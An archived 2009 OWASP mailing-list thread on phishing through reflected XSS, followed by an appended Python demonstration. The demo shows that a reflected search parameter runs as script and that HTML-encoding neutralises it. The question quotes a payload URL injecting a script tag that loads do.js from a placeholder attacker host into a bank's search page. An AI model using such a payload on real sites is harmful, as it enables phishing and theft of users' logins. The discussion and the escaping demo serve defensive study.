[Owasp-delhi] Phishing with XSS

Karthik Muthukrishnan karthik.muthukrishnan at tcs.com
Fri Feb 27 06:45:26 EST 2009


The result of this XSS attack depends on how the application processes (or
how vulnerable it is to) the 'Search' parameter.

On a successful XSS attack, the attack script in the search parameter must
be embedded in the HTML of the search results page. In this case, the
attack script will just run silently, like other scripts in <script> tags.

The browser (behavior varies depending on MIME type) will prompt you with a
save-as message box only when the XSS attack caused the web application
('search' page) to download the remote file and send it to the user. FF on my
system just displays the script text. In IE7, after I click open, I am
presented with a security warning about an unknown publisher.


Karthik Muthukrishnan
Information Risk Management Consultant
Tata Consultancy Services
Mailto: karthik.muthukrishnan at tcs.com
Website: http://www.tcs.com


From: Parmendra Sharma <s.parmendra at gmail.com>
Sent by: owasp-delhi-bounces at lists.owasp.org
Date: 02/25/2009 04:56 PM
To: owasp-delhi at lists.owasp.org
Subject: [Owasp-delhi] Phishing with XSS




Hello OWASP Members,

I have a doubt and here it is......

In performing Phishing with XSS a script like "do.js"

"http://www.attacked-bank.com/module.asp?search=<Script
src=http://attacker-IP-address/do.js/>"

can be used to change the original login page to the attacker's choice
without actually changing the URL.

Now my question is that for performing the above-said case this script needs
to be executed by the browser without the user's consent. In a general
scenario, while requesting a script like this, first a pop-up is given by
the browser asking whether to run or to save the script.

Please suggest.



--
Thanks and Regards:

Parmendra Sharma
Indian Computer Emergency Response Team (CERT-In)
Ministry of Information Technology
Government of India
6 C.G.O Complex
Lodhi Road
New Delhi
_______________________________________________
Owasp-delhi mailing list
Owasp-delhi at lists.owasp.org
https://lists.owasp.org/mailman/listinfo/owasp-delhi
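
The behaviour described in the reply, as an added example that is not part of the original thread: when the 'search' value is reflected verbatim, an HTML parser sees a real script element inside the results page (so nothing is "downloaded" and no prompt appears), and HTML-encoding the value turns it into inert text. The template and function names are hypothetical Python stand-ins for the ASP page; the payload is the one quoted in the question.

```python
import html
from html.parser import HTMLParser

# Constructed stand-in for the search results template (not the real module.asp).
TEMPLATE = "<html><body><h1>Results for: {term}</h1></body></html>"

# Payload exactly as quoted in the question (placeholder host name).
PAYLOAD = "<Script src=http://attacker-IP-address/do.js/>"


def render_vulnerable(search: str) -> str:
    """Reflects the parameter verbatim, so markup in it becomes page markup."""
    return TEMPLATE.format(term=search)


def render_encoded(search: str) -> str:
    """HTML-encodes the parameter, so the browser renders it as plain text."""
    return TEMPLATE.format(term=html.escape(search, quote=True))


class ScriptSrcCollector(HTMLParser):
    """Records the src attribute of every <script> element found in a page."""

    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        # Tag and attribute names arrive lower-cased, so "<Script" matches too.
        if tag == "script":
            self.sources.append(dict(attrs).get("src") or "")

    def handle_startendtag(self, tag, attrs):
        # Self-closing form "<script ... />" is treated the same way.
        self.handle_starttag(tag, attrs)


def script_sources(page: str) -> list:
    """Returns the src of each script element a parser finds in the page."""
    collector = ScriptSrcCollector()
    collector.feed(page)
    collector.close()
    return collector.sources


if __name__ == "__main__":
    print("verbatim:", script_sources(render_vulnerable(PAYLOAD)))
    print("encoded: ", script_sources(render_encoded(PAYLOAD)))
```
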
